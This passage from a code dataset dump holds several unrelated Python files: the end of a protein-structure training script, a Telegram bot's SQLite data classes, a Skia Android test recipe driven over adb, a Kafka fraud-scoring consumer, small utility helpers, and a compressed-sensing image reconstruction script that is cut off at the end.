xi_size_high_res = high_res_grid_size[3],\n                                      eta_size_high_res = high_res_grid_size[4],\n                                      channels_high_res = high_res_grid_size[5],\n                                      output_size = output_size,\n                                      optimize_using_lbfgs = options.optimize_using_lbfgs,\n                                      reg_fact = options.reg_fact,\n                                      learning_rate = options.learning_rate,\n                                      model_checkpoint_path = options.model_checkpoint_path,\n                                      max_to_keep = options.max_to_keep)\n    elif options.model.startswith(\"Cartesian\"):\n        model = models[options.model](x_size_high_res = high_res_grid_size[1],\n                                      y_size_high_res = high_res_grid_size[2],\n                                      z_size_high_res = high_res_grid_size[3],\n                                      channels_high_res = high_res_grid_size[4],\n                                      output_size = output_size,\n                                      optimize_using_lbfgs = options.optimize_using_lbfgs,\n                                      reg_fact = options.reg_fact,\n                                      learning_rate = options.learning_rate,\n                                      model_checkpoint_path = options.model_checkpoint_path,\n                                      max_to_keep = options.max_to_keep)\n    else:\n        raise argparse.ArgumentTypeError(\"Model type not supported: %s\" % options.model)\n    \n\n    if options.read_from_checkpoint:\n        model.restore(options.model_checkpoint_path, step=options.step)\n    \n    \n    if options.mode == 'train':\n        model.train(train_batch_factory = batch_factory,\n                    validation_batch_factory = validation_batch_factory,\n                    num_passes = options.num_passes,\n                    max_batch_size = options.max_batch_size,\n                    subbatch_max_size = options.subbatch_max_size,\n                    dropout_keep_prob = options.dropout_keep_prob,\n                    output_interval = options.output_interval)\n\n    elif options.mode == 'test':\n\n        additional_labels = []\n        if options.torusdbn_prediction_input_dir:\n            additional_labels.append(\"TORUSDBN\")\n        if options.pssm_input_dir:\n            additional_labels.append(\"PSSM\")\n        print(\"# Q%s loss PDB %s\" % (output_size, \" \".join(additional_labels)))\n\n        prev_pdb_id = None\n        pdb_ids = set()\n        all_identical = np.array([])\n        all_entropies = np.array([])\n\n        torusdbn_all_identical = np.array([])\n        pssm_all_identical = np.array([])\n\n        more_data = True\n\n        while more_data:\n\n            batch, subbatch_sizes = batch_factory.next(options.max_batch_size,\n                                                       subbatch_max_size=options.subbatch_max_size,\n                                                       enforce_protein_boundaries=True,\n                                                       include_pdb_ids=True,\n                                                       return_single_proteins=True)\n            more_data = (batch_factory.feature_index != 0)\n            loss, identical, entropies, regularization = model.Q_accuracy_and_loss(batch, subbatch_sizes, return_raw=True)\n\n            # Note that return_single_proteins makes sure that the batch always returns a whole protein\n            assert(batch[\"pdb\"][1:] == batch[\"pdb\"][:-1])\n            assert(batch[\"pdb\"][0] != prev_pdb_id)\n            prev_pdb_id = batch[\"pdb\"][0]\n\n            # Update the overall stats\n            pdb_ids = pdb_ids.union(set(batch[\"pdb\"]))\n            all_identical = np.concatenate((all_identical, identical))\n            all_entropies = np.concatenate((all_entropies, entropies))\n\n            # Calculate the accuracy for TorusDBN\n            if 
options.torusdbn_prediction_input_dir:\n                if batch[\"pdb\"][0] not in torus_skip_list:\n                    torusdbn_Q_test, torusdbn_identical = torusdbn_Q_accuracy(batch)\n                    torusdbn_all_identical = np.concatenate((torusdbn_all_identical, torusdbn_identical))\n                else:\n                    torusdbn_Q_test = None\n\n\n            # Calculate the accuracy for the PSSM model\n            if options.pssm_input_dir:\n                pssm_Q_test, pssm_identical = pssm_Q_accuracy(batch)\n                pssm_all_identical = np.concatenate((pssm_all_identical, pssm_identical))\n\n            # Print the accuracies for this PDB\n            additional_values = []\n            if options.torusdbn_prediction_input_dir:\n                additional_values.append(torusdbn_Q_test)\n            if options.pssm_input_dir:\n                additional_values.append(pssm_Q_test)\n\n            Q_test = np.mean(identical)\n            loss_test = loss\n\n            print(Q_test, loss_test, \",\".join([pdb_id for pdb_id in set(batch[\"pdb\"])]), \"%s\" % \" \".join(map(str, additional_values)))\n\n        # Print the overall scores\n        Q_test = np.mean(all_identical)\n        loss_test = np.mean(all_entropies) + regularization\n\n        print(\"# Statistics for the whole dataset:\")\n        print(\"# Q%s score (test set): %f\" % (output_size, Q_test))\n        print(\"# loss (test set): %f\" % (loss_test))\n\n        if options.torusdbn_prediction_input_dir:\n            print(\"# TORUSDBN COMPARISON: Q%s score (test set): %s\" % (output_size, np.mean(torusdbn_all_identical)))\n        if options.pssm_input_dir:\n            print(\"# PSSM COMPARISON: Q%s score (test set): %s\" % (output_size, np.mean(pssm_all_identical)))\n\n        print(\"# PDB IDs: \", [pdb_id for pdb_id in pdb_ids])\n","repo_name":"rcoor/cubed-sphere","sub_path":"python3-deepfold/deepfold_train.py","file_name":"deepfold_train.py","file_ext":"py","file_size_in_byte":15533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10713728382","text":"def yes_no(question):\n\n    error = \"Please answer with either yes/no\"\n\n    valid = False\n    while not valid:\n\n\n        response = input(question).lower()\n\n        if response == \"yes\" or response == \"y\":\n            valid = True\n            return \"yes\"\n\n        elif response == \"no\" or response == \"n\":\n            valid = True\n            return \"no\"\n\n        else:\n            print(error)\n\nfor item in range(0,6):\n    want_snacks = yes_no(\"Does thou want any of thy snacks?\")\n","repo_name":"FrancesMangos/22_movie_fundraiser","sub_path":"venv/05_yes_no_checker_v1.py","file_name":"05_yes_no_checker_v1.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36658165059","text":"import sqlite3\n\nfrom databases.auth_data import path\nfrom log.create_logger import logger\n\n\nclass SentencesDB:\n    \"\"\"\n    Entity that holds the RUS/EN command sentences.\n    In other words, a table that holds all of the bot's text: buttons/commands/sentences in two languages\n    \"\"\"\n    # Entity attributes:\n    # 1. type_sentence - The type of a button or the type of a sentence.\n    # For example: \"Button 1\", \"Button 2\", \"Sentence 1\" and so on.\n    # 2. sentence - The text itself that a given sentence/command/button will contain.\n    # 3. language - The language of the current sentence. Since this application uses two languages and no expansion is planned,\n    # True is RUS and False is EN\n    # 4. 
photo_id - The Telegram ID of the photo set by the admin.\n    # In this entity the attributes type_sentence and language act as a composite key through which\n    # any sentence can be pulled out, but they repeat, so to bring the table up to 2NF\n    # a plain pk was created ;)\n    def __init__(self):\n        try:\n            self.__base = sqlite3.connect(path)\n            self.__cur = self.__base.cursor()\n            # self.__cur.execute('''CREATE TABLE IF NOT EXISTS sentences(\n            #                         pk INTEGER PRIMARY KEY AUTOINCREMENT,\n            #                         type_sentence VARCHAR(255),\n            #                         sentence TEXT,\n            #                         language BOOLEAN,\n            #                         # photo_id TEXT\n            #                         )''')\n            # self.__base.commit()\n        except Exception as ex:\n            logger.warning(f'Errors occurred while connecting to the sentences entity\\n'\n                           f'{ex}')\n\n    def exists_sentence(self, type_sentence: str, language: bool) -> bool:\n        \"\"\"\n        Check whether this entity contains the given type_sentence with the given language.\n        In other words, check whether such a command/sentence exists for a specific language (RUS/EN)\n        \"\"\"\n        self.__cur.execute('SELECT sentence '\n                           'FROM sentences '\n                           'WHERE type_sentence = ? and language = ?',\n                           (type_sentence, language))\n        return len(self.__cur.fetchmany(1)).__bool__()\n\n    def add_sentence(self, type_sentence: str, sentence: str, language: bool) -> bool:\n        \"\"\"\n        Add a new sentence to this entity\n        \"\"\"\n        try:\n            self.__cur.execute('INSERT INTO sentences(type_sentence, sentence, language) '\n                               'VALUES(?, ?, ?)',\n                               (type_sentence, sentence, language))\n            self.__base.commit()\n            return True\n        except Exception as ex:\n            logger.warning(f'An error occurred when inserting data into the sentences entity\\n'\n                           f'{ex}')\n            return False\n\n    def update_sentence(self, type_sentence: str, sentence: str, language: bool) -> bool:\n        \"\"\"\n        Update the sentence that matches a specific type_sentence and language\n        \"\"\"\n        try:\n            self.__cur.execute('UPDATE sentences '\n                               'SET sentence = ? '\n                               'WHERE type_sentence = ? and language = ?',\n                               (sentence, type_sentence, language))\n            self.__base.commit()\n            return True\n        except Exception as ex:\n            logger.warning(f'Errors occurred in the process of updating data in the sentences entity\\n'\n                           f'{ex}')\n            return False\n\n    def set_photo_in_sentence(self, type_sentence: str, language: bool, photo_id: str) -> bool:\n        try:\n            self.__cur.execute('UPDATE sentences '\n                               'SET photo_id = ? '\n                               'WHERE type_sentence = ? and language = ?',\n                               (photo_id, type_sentence, language))\n            self.__base.commit()\n            return True\n        except Exception as ex:\n            logger.warning(f'An error occurred while adding photo to the sentences entity\\n'\n                           f'{ex}')\n            return False\n\n    def set_video_in_sentence(self, type_sentence: str, language: bool, video_id: str) -> bool:\n        try:\n            self.__cur.execute('UPDATE sentences '\n                               'SET video_id = ? '\n                               'WHERE type_sentence = ? and language = ?',\n                               (video_id, type_sentence, language))\n            self.__base.commit()\n            return True\n        except Exception as ex:\n            logger.warning(f'An error occurred while adding video_id to the sentences entity\\n'\n                           f'{ex}')\n            return False\n\n    def get_sentence(self, type_sentence: str, language: bool):\n        self.__cur.execute('SELECT sentence '\n                           'FROM sentences '\n                           'WHERE type_sentence = ? and language = ?',\n                           (type_sentence, language))\n        sentences = self.__cur.fetchmany(1)\n        if sentences:\n            return sentences[0][0]\n        return 0\n\n    def get_photo_id(self, type_sentence: str, language: bool):\n        self.__cur.execute('SELECT photo_id '\n                           'FROM sentences '\n                           'WHERE type_sentence = ? 
and language = ?',\n                           (type_sentence, language))\n        photo_id = self.__cur.fetchone()\n        if photo_id:\n            return photo_id[0]\n        return 0\n\n    def get_video_id(self, type_sentence: str, language: bool):\n        self.__cur.execute('SELECT video_id '\n                           'FROM sentences '\n                           'WHERE type_sentence = ? and language = ?',\n                           (type_sentence, language))\n        video_id = self.__cur.fetchone()\n        if video_id:\n            return video_id[0]\n        return 0\n\n    def __del__(self):\n        self.__cur.close()\n        self.__base.close()\n\n\nclass UsersDB:\n    \"\"\"\n    Entity that will hold all information about a user\n    \"\"\"\n    # Entity attributes:\n    # 1. user_id - primary key, which is the user's Telegram ID.\n    # 2. language - the language the user uses. Since this application uses two languages and\n    # no expansion is planned, True is RUS and False is EN\n    # 3. city - the user's country.\n    # 4. full_name - the user's full name. Notes: Cyrillic\n    # 5. sex - the user's sex.\n    # 6. birth_date - date of birth. Notes: 18 years or older\n    # 7. phone_number - phone number.\n    # 8. postal_code - postal code.\n    # 9. address - the user's address. Notes: Cyrillic\n    # 10. email - the user's email address.\n    # 11. purpose_registration - purpose of registration.\n    def __init__(self):\n        try:\n            self.__base = sqlite3.connect(path)\n            self.__cur = self.__base.cursor()\n            # self.__cur.execute('''CREATE TABLE IF NOT EXISTS users(\n            #                         user_id BIGINT PRIMARY KEY,\n            #                         language BOOLEAN,\n            #                         city VARCHAR(255),\n            #                         full_name VARCHAR(255),\n            #                         sex VARCHAR(255),\n            #                         birth_date VARCHAR(255),\n            #                         phone_number VARCHAR(255),\n            #                         postal_code VARCHAR(255),\n            #                         address VARCHAR(255),\n            #                         email VARCHAR(255),\n            #                         purpose_registration TEXT,\n            #                         register_status BOOLEAN DEFAULT FALSE\n            #                         )''')\n            # self.__base.commit()\n        except Exception as ex:\n            logger.warning(f'Errors occurred while connecting to the users entity\\n'\n                           f'{ex}')\n\n    def exists_user(self, user_id: int) -> bool:\n        self.__cur.execute('SELECT user_id '\n                           'FROM users '\n                           'WHERE user_id = ?',\n                           (user_id, ))\n        return len(self.__cur.fetchmany(1)).__bool__()\n\n    def get_register_status(self, user_id: int) -> bool:\n        self.__cur.execute('SELECT register_status '\n                           'FROM users '\n                           'WHERE user_id = ?',\n                           (user_id, ))\n        register_status = self.__cur.fetchone()\n        if register_status:\n            return register_status[0]\n        return False\n\n    def add_user(self, user_id: int, language: bool, username: str) -> bool:\n        \"\"\"\n        Add a user to this entity\n        \"\"\"\n        try:\n            self.__cur.execute('INSERT INTO users(user_id, language, username) '\n                               'VALUES(?, ?, ?)',\n                               (user_id, language, username))\n            self.__base.commit()\n            return True\n        except Exception as ex:\n            logger.warning(f'An error occurred when inserting data into the users entity\\n'\n                           f'{ex}')\n            return False\n\n    def add_form_data(self, user_id: int, city: str, full_name: str, sex: str, birth_date: str, phone_number: str,\n                      postal_code: str, address: str, email: str, purpose_registration: str) -> bool:\n        \"\"\"\n        Add user data after the form has been filled in.\n        \"\"\"\n        try:\n            self.__cur.execute('UPDATE users '\n                               'SET city = ?, full_name = ?, sex = ?, birth_date = ?, phone_number = ?, '\n                               'postal_code = ?, address = ?, email = ?, purpose_registration = ?, register_status = ? '\n                               'WHERE user_id = ?',\n                               (city, full_name, sex, birth_date, phone_number, postal_code, address,\n                                email, purpose_registration, True, user_id))\n            self.__base.commit()\n            return True\n        except Exception as ex:\n            logger.warning(f'An 
error occurred when adding data from the form to the users model\\n'\n f'{ex}')\n return False\n\n def get_user(self, user_id: int) -> list:\n self.__cur.execute('SELECT * '\n 'FROM users '\n 'WHERE user_id = ?',\n (user_id, ))\n return self.__cur.fetchall()\n\n def get_language_user(self, user_id: int):\n self.__cur.execute('SELECT language '\n 'FROM users '\n 'WHERE user_id = ?',\n (user_id, ))\n language = self.__cur.fetchmany(1)\n if language:\n return language[0][0]\n return 0\n\n def __del__(self):\n self.__cur.close()\n self.__base.close()\n","repo_name":"EgorKondratyev/atomy","sub_path":"databases/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":12058,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38489772470","text":"from recipe_engine import recipe_api\n\nimport default_flavor\nimport subprocess\n\n\n\"\"\"GN Android flavor utils, used for building Skia for Android with GN.\"\"\"\nclass GNAndroidFlavorUtils(default_flavor.DefaultFlavorUtils):\n def __init__(self, m):\n super(GNAndroidFlavorUtils, self).__init__(m)\n self._ever_ran_adb = False\n\n self.device_dirs = default_flavor.DeviceDirs(\n dm_dir = self.m.vars.android_data_dir + 'dm_out',\n perf_data_dir = self.m.vars.android_data_dir + 'perf',\n resource_dir = self.m.vars.android_data_dir + 'resources',\n images_dir = self.m.vars.android_data_dir + 'images',\n skp_dir = self.m.vars.android_data_dir + 'skps',\n svg_dir = self.m.vars.android_data_dir + 'svgs',\n tmp_dir = self.m.vars.android_data_dir)\n\n def _run(self, title, *cmd, **kwargs):\n with self.m.step.context({'cwd': self.m.vars.skia_dir}):\n return self.m.run(self.m.step, title, cmd=list(cmd), **kwargs)\n\n def _py(self, title, script, infra_step=True):\n with self.m.step.context({'cwd': self.m.vars.skia_dir}):\n return self.m.run(self.m.python, title, script=script,\n infra_step=infra_step)\n\n def _adb(self, title, *cmd, **kwargs):\n self._ever_ran_adb = True\n # The only non-infra adb steps (dm / nanobench) happen to not use _adb().\n if 'infra_step' not in kwargs:\n kwargs['infra_step'] = True\n return self._run(title, 'adb', *cmd, **kwargs)\n\n def compile(self, unused_target):\n compiler = self.m.vars.builder_cfg.get('compiler')\n configuration = self.m.vars.builder_cfg.get('configuration')\n extra_config = self.m.vars.builder_cfg.get('extra_config', '')\n os = self.m.vars.builder_cfg.get('os')\n target_arch = self.m.vars.builder_cfg.get('target_arch')\n\n assert compiler == 'Clang' # At this rate we might not ever support GCC.\n\n extra_cflags = []\n if configuration == 'Debug':\n extra_cflags.append('-O1')\n\n ndk_asset = 'android_ndk_linux'\n if 'Mac' in os:\n ndk_asset = 'android_ndk_darwin'\n elif 'Win' in os:\n ndk_asset = 'n'\n\n quote = lambda x: '\"%s\"' % x\n args = {\n 'ndk': quote(self.m.vars.slave_dir.join(ndk_asset)),\n 'target_cpu': quote(target_arch),\n }\n\n if configuration != 'Debug':\n args['is_debug'] = 'false'\n if 'Vulkan' in extra_config:\n args['ndk_api'] = 24\n args['skia_enable_vulkan_debug_layers'] = 'false'\n if 'FrameworkDefs' in extra_config:\n args['skia_enable_android_framework_defines'] = 'true'\n if extra_cflags:\n args['extra_cflags'] = repr(extra_cflags).replace(\"'\", '\"')\n\n gn_args = ' '.join('%s=%s' % (k,v) for (k,v) in sorted(args.iteritems()))\n\n gn = 'gn.exe' if 'Win' in os else 'gn'\n ninja = 'ninja.exe' if 'Win' in os else 'ninja'\n gn = self.m.vars.skia_dir.join('bin', gn)\n\n self._py('fetch-gn', 
self.m.vars.skia_dir.join('bin', 'fetch-gn'))\n self._run('gn gen', gn, 'gen', self.out_dir, '--args=' + gn_args)\n self._run('ninja', ninja, '-C', self.out_dir)\n\n def install(self):\n self._adb('mkdir ' + self.device_dirs.resource_dir,\n 'shell', 'mkdir', '-p', self.device_dirs.resource_dir)\n\n\n def cleanup_steps(self):\n if self._ever_ran_adb:\n self.m.run(self.m.python.inline, 'dump log', program=\"\"\"\n import os\n import subprocess\n import sys\n out = sys.argv[1]\n log = subprocess.check_output(['adb', 'logcat', '-d'])\n for line in log.split('\\\\n'):\n tokens = line.split()\n if len(tokens) == 11 and tokens[-7] == 'F' and tokens[-3] == 'pc':\n addr, path = tokens[-2:]\n local = os.path.join(out, os.path.basename(path))\n if os.path.exists(local):\n sym = subprocess.check_output(['addr2line', '-Cfpe', local, addr])\n line = line.replace(addr, addr + ' ' + sym.strip())\n print line\n \"\"\",\n args=[self.m.vars.skia_out.join(self.m.vars.configuration)],\n infra_step=True,\n abort_on_failure=False)\n\n # Only shutdown the device and quarantine the bot if the first failed step\n # is an infra step. If, instead, we did this for any infra failures, we\n # would shutdown too much. For example, if a Nexus 10 died during dm\n # and the following pull step would also fail \"device not found\" - causing\n # us to run the shutdown command when the device was probably not in a\n # broken state; it was just rebooting.\n if (self.m.run.failed_steps and\n isinstance(self.m.run.failed_steps[0], recipe_api.InfraFailure)):\n self._adb('shut down device to quarantine bot', 'shell', 'reboot', '-p')\n\n if self._ever_ran_adb:\n self._adb('kill adb server', 'kill-server')\n\n def step(self, name, cmd, **kwargs):\n app = self.m.vars.skia_out.join(self.m.vars.configuration, cmd[0])\n self._adb('push %s' % cmd[0],\n 'push', app, self.m.vars.android_bin_dir)\n\n sh = '%s.sh' % cmd[0]\n self.m.run.writefile(self.m.vars.tmp_dir.join(sh),\n 'set -x; %s%s; echo $? >%src' %\n (self.m.vars.android_bin_dir, subprocess.list2cmdline(map(str, cmd)),\n self.m.vars.android_bin_dir))\n self._adb('push %s' % sh,\n 'push', self.m.vars.tmp_dir.join(sh), self.m.vars.android_bin_dir)\n\n self._adb('clear log', 'logcat', '-c')\n self.m.python.inline('%s' % cmd[0], \"\"\"\n import subprocess\n import sys\n bin_dir = sys.argv[1]\n sh = sys.argv[2]\n subprocess.check_call(['adb', 'shell', 'sh', bin_dir + sh])\n try:\n sys.exit(int(subprocess.check_output(['adb', 'shell', 'cat',\n bin_dir + 'rc'])))\n except ValueError:\n print \"Couldn't read the return code. Probably killed for OOM.\"\n sys.exit(1)\n \"\"\", args=[self.m.vars.android_bin_dir, sh])\n\n def copy_file_to_device(self, host, device):\n self._adb('push %s %s' % (host, device), 'push', host, device)\n\n def copy_directory_contents_to_device(self, host, device):\n # Copy the tree, avoiding hidden directories and resolving symlinks.\n self.m.run(self.m.python.inline, 'push %s/* %s' % (host, device),\n program=\"\"\"\n import os\n import subprocess\n import sys\n host = sys.argv[1]\n device = sys.argv[2]\n for d, _, fs in os.walk(host):\n p = os.path.relpath(d, host)\n if p != '.' 
and p.startswith('.'):\n          continue\n        for f in fs:\n          print os.path.join(p,f)\n          subprocess.check_call(['adb', 'push',\n                                 os.path.realpath(os.path.join(host, p, f)),\n                                 os.path.join(device, p, f)])\n    \"\"\", args=[host, device], infra_step=True)\n\n  def copy_directory_contents_to_host(self, device, host):\n    self._adb('pull %s %s' % (device, host), 'pull', device, host)\n\n  def read_file_on_device(self, path, **kwargs):\n    rv = self._adb('read %s' % path,\n                   'shell', 'cat', path, stdout=self.m.raw_io.output(),\n                   **kwargs)\n    return rv.stdout.rstrip() if rv and rv.stdout else None\n\n  def remove_file_on_device(self, path):\n    self._adb('rm %s' % path, 'shell', 'rm', '-f', path)\n\n  def create_clean_device_dir(self, path):\n    self._adb('rm %s' % path, 'shell', 'rm', '-rf', path)\n    self._adb('mkdir %s' % path, 'shell', 'mkdir', '-p', path)\n","repo_name":"RaziaSandhu/Drawings","sub_path":"skia/infra/bots/recipe_modules/flavor/gn_android_flavor.py","file_name":"gn_android_flavor.py","file_ext":"py","file_size_in_byte":7405,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"5073562337","text":"#!/usr/bin/python3\n\nimport os\nimport json\nimport pickle\nimport pandas as pd\nimport connection\nfrom kafka import KafkaConsumer\nfrom category_encoders import OrdinalEncoder\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\ndef transform(df):\n    df = df.drop(['Id', 'logTimestamp'], axis=1)\n    df.columns = ['device', 'activity']\n    encoder = OrdinalEncoder()\n    df = encoder.fit_transform(df)\n    return df\n\nif __name__ == '__main__':\n\n    consumer = KafkaConsumer('aaa', bootstrap_servers='localhost')\n\n    for message in consumer:\n\n        data = json.loads(message.value)\n        df = pd.DataFrame([data])\n        df.to_sql('user_activity', connection.warehouse(), if_exists='append', index=False)\n        print(f'Records = {data}')\n\n        model = pickle.load(open(os.getcwd()+'/model/model.pkl', 'rb'))\n        prediction = 'Not Fraud' if model.predict(transform(df)) == 0 else 'Fraud'\n\n        df = pd.DataFrame([{'Id': data['Id'], 'userFlag':prediction}])\n        df.to_sql('user_fraud', connection.warehouse(), if_exists='append', index=False)\n        print(f'Prediction: {prediction}')\n","repo_name":"isa96/kafka-stream-processing","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"72989586772","text":"import ast\n\ndef filetolist(filename):\n\tinfile = open(filename, 'r')\n\toutlist = []\n\tfor line in infile:\n\t\t# exec() cannot bind new locals in Python 3; parse the tuple literal safely instead\n\t\toutlist.append(ast.literal_eval(line.rstrip()))\n\tinfile.close()\n\treturn outlist\n\t\ndef listtofile(filename, l):\n\toutfile = open(filename, 'w')\n\tfor item in l:\n\t\toutfile.write(str(item) + '\\n')\n\toutfile.close()\n\t\ndef getnext(infile):\n\ttmp = infile.readline().rstrip()\n\tif tmp == '':\n\t\treturn None\n\telse:\n\t\treturn ast.literal_eval(tmp)\n\n\t\n\t\ndef doreduce(infilename1, infilename2, outfilename):\n\tinfile1 = open (infilename1, 'r')\n\tinfile2 = open (infilename2, 'r')\n\toutfile = open (outfilename, 'w')\n\t\n\ti = getnext(infile1)\n\tj = getnext(infile2)\n\t\n\twhile (i != None and j != None):\n\t\tif (i[0] < j[0]):\n\t\t\toutfile.write(str(i) + '\\n')\n\t\t\ti = getnext(infile1)\n\t\telif(j[0] < i[0]):\n\t\t\toutfile.write(str(j) + '\\n')\n\t\t\tj = getnext(infile2)\n\t\telse:\n\t\t\ttmp = (i[0], i[1] + j[1])\n\t\t\toutfile.write(str(tmp) + '\\n')\n\t\t\ti = getnext(infile1)\n\t\t\tj = 
getnext(infile2)\n\t\n\twhile (i != None) :\n\t\toutfile.write(str(i) + '\\n')\n\t\ti = getnext(infile1)\n\t\t\n\twhile (j != None) :\n\t\toutfile.write(str(j) + '\\n')\n\t\tj = getnext(infile2)\n\t\n\tinfile1.close()\n\tinfile2.close()\n\toutfile.close()\n","repo_name":"brmj/distrubuted_systems_group_project","sub_path":"GroupProject/libs/Lib/sortreduce.py","file_name":"sortreduce.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11017824741","text":"import os\nimport pathlib\n\nimport appdirs\n\nfrom labm8.py import app\n\nFLAGS = app.FLAGS\n\n\ndef GetCacheDir() -> pathlib.Path:\n \"\"\"Resolve the cache directory for linters.\"\"\"\n _BAZEL_TEST_TMPDIR = os.environ.get(\"TEST_TMPDIR\")\n if _BAZEL_TEST_TMPDIR:\n cache_dir = pathlib.Path(os.environ[\"TEST_TMPDIR\"]) / \"cache\"\n else:\n cache_dir = pathlib.Path(\n appdirs.user_cache_dir(\"phd_format\", \"Chris Cummins\", version=app.VERSION)\n )\n cache_dir.mkdir(parents=True, exist_ok=True)\n return cache_dir\n","repo_name":"ChrisCummins/phd","sub_path":"tools/format/app_paths.py","file_name":"app_paths.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":181,"dataset":"github-code","pt":"67"} +{"seq_id":"1350048063","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#==============================================================================\n\n\"\"\"\nBlock Compressed Sensing\nSmoothed Projected Landweber\n@author: nacho\n\"\"\"\nimport sys\nimport numpy as np\nfrom numpy.random import default_rng\nimport argparse\nimport patch_mapping as patmap\nimport paco.linop as linop\nfrom skimage import io as imgio\nimport scipy.signal as dsp\n\nrng = default_rng(1863699)\n\n#==============================================================================\n\ndef create_proj_op(m,nproj,type='random'):\n if nproj > 0:\n K = nproj\n else:\n K = int(m/5)\n print(\"Taking \",K,\" measurements per block\")\n if type == 'random' or type == 'binary':\n Wn = rng.normal(size=(m,m))\n # EXPERIMENTAL: add DC term\n Wn[0,:] = 1.0/np.sqrt(m)\n Pk = Wn[:K,:]\n _,_,P = np.linalg.svd(Pk,full_matrices=False)\n if type == 'binary':\n P = 1-2*(P>0)\n #\n # normalize\n #\n nP = np.sum(P**2,axis=1)\n W = np.diag(1.0/np.sqrt(nP))\n P = np.dot(W,P)\n return P\n else:\n return None\n\n\n#==============================================================================\n\nif __name__ == '__main__':\n epilog = \"Output image file name is built from input name and parameters.\"\n parser = argparse.ArgumentParser(epilog=epilog)\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\")\n parser.add_argument(\"-w\", \"--width\", type=int, default=16,\n help=\"patch width\")\n parser.add_argument(\"--lam\", type=float, default=6,\n help=\"Thresholding parameter\")\n parser.add_argument(\"--kappa\", type=float, default=0.6,\n help=\"Thresholding parameter decrease (0.6 from paper)\")\n parser.add_argument(\"--max-iter\", type=int, default=100,\n help=\"Maximum ADMM iterations\")\n parser.add_argument(\"-e\", \"--eps\", type=float, default=1e-5,\n help=\"Smoothing constant in L1 weights estimation.\")\n parser.add_argument(\"--proj-num\", type=int, default=50,\n help=\"Number of compressed sensing projections.\")\n parser.add_argument(\"--proj-type\", type=str, default=\"random\",\n help=\"Type of compressed sensing operator (random, binary, dct, idct).\")\n parser.add_argument(\"--inner-tol\", type=float, 
default=5e-4,\n                        help=\"Tolerance for inner ADMM.\")\n    parser.add_argument(\"--outer-tol\", type=float, default=5e-4,\n                        help=\"Tolerance for outer ADMM.\")\n    parser.add_argument(\"--inner-maxiter\", type=int, default=100,\n                        help=\"Maximum number of iterations in inner ADMM.\")\n\n    parser.add_argument(\"input\", help=\"input image file\")\n    parser.add_argument(\"output\", default=\"\", help=\"recovered image file\")\n    args = parser.parse_args()\n\n    cmd = \" \".join(sys.argv)\n    print((\"Command: \" + cmd))\n    print(args)\n    #\n    #\n    # parameters (for now the best for desfile1 at least)\n    #\n    # good parameters: 4x8x8+1+2+#\n    width = args.width\n    stride = width # args.stride\n\n    Itrue = imgio.imread(args.input)\n    Itrue = patmap.pad_image(Itrue,width,stride)\n    M,N = Itrue.shape\n    nrows,ncols = Itrue.shape\n    npixels = nrows*ncols\n\n    Xtrue = patmap.extract(Itrue,width,stride)\n\n    n,m = Xtrue.shape\n    print(\"Signal dimension =\",m)\n    print(\"Number of blocks =\",n)\n    P = create_proj_op(m,args.proj_num,args.proj_type)\n    aux = np.eye(m)\n    w = int(np.sqrt(m))\n    D = np.empty((m,m))\n    linop.dct2d(aux,w,w,D)\n    G = np.dot(D.T,D)\n    W = np.diag(1.0/np.diag(np.sqrt(G)))\n    D = np.dot(D,W)\n    G = np.dot(D.T,D)\n\n    K = P.shape[0]\n    B = np.dot(Xtrue,P.T)\n    nsamples = n*K\n    cratio = n*K / npixels\n    print(\"Compression ratio (compressed samples / recovered samples)=\",cratio)\n\n    print(\"Running algorithm\")\n    dif = 1e20\n    I = np.zeros(Itrue.shape)\n    Y = np.zeros((n,m))\n    Z = np.zeros((n,m))\n    prevY = np.zeros(Y.shape) # and its previous value\n    J = np.empty(Itrue.shape) # reconstructed image\n    Rxx = 0.01*np.eye(m)\n    Y = np.dot(np.dot(B,P),np.linalg.inv(np.dot(P.T,P)+Rxx))\n    I = patmap.stitch(Y,width,stride,nrows,ncols)\n    imgio.imsave('0.png',I)\n    #\n    # main ADMM loop\n    #\n    lam = args.lam\n    for i in range(args.max_iter):\n        # smoothing (on whole image)\n        I = dsp.wiener(I,(3,3))\n        # Y = patches(I)\n        Y[:] = patmap.extract(I, width, stride)\n        # landweber iteration (on patches)\n        Y = Y + np.dot(B - np.dot(Y,P.T),P)\n        #\n        # projection\n        #\n        Z = np.dot(Y,D.T)\n        sigma = np.median(np.abs(Z))/0.6745\n        tau = lam * sigma * np.sqrt(2*np.log(M*N))\n        Z[np.abs(Z) < tau] = 0\n        Y = np.dot(Z,D)\n        #\n        # another landweber iteration\n        #\n        Y = Y + np.dot(B - np.dot(Y,P.T),P)\n        #\n        # stitch\n        #\n        I = patmap.stitch(Y,width,stride,nrows,ncols)\n        dY = np.linalg.norm(Y - prevY, 'fro') / (1e-10 + np.linalg.norm(Y, 'fro'))\n        prevY[:] = Y # keep a copy for the next convergence check\n        #\n        # reduce lambda (paper does it)\n        #\n        lam *= args.kappa\n        Xerr = np.linalg.norm(Y - Xtrue, 'fro') / np.linalg.norm(Xtrue, 'fro')\n        merr = np.linalg.norm(np.dot(Y, P.T) - B, 'fro') / np.linalg.norm(B)\n        Ierr = np.sqrt(np.mean((I-Itrue)**2))\n        psnr = 20*np.log10(1.0/Ierr)\n        print(f\"i={i:5} dX={dY:8.5f} MSE={Ierr:8.5f} PSNR={psnr:8.5f}\")\n        I = np.minimum(1.0,np.maximum(0.0,I))\n        # save with skimage; it takes no cmap argument and matplotlib is not imported in this script\n        imgio.imsave(f\"iter{i:04d}.png\",I)\n        if dY < 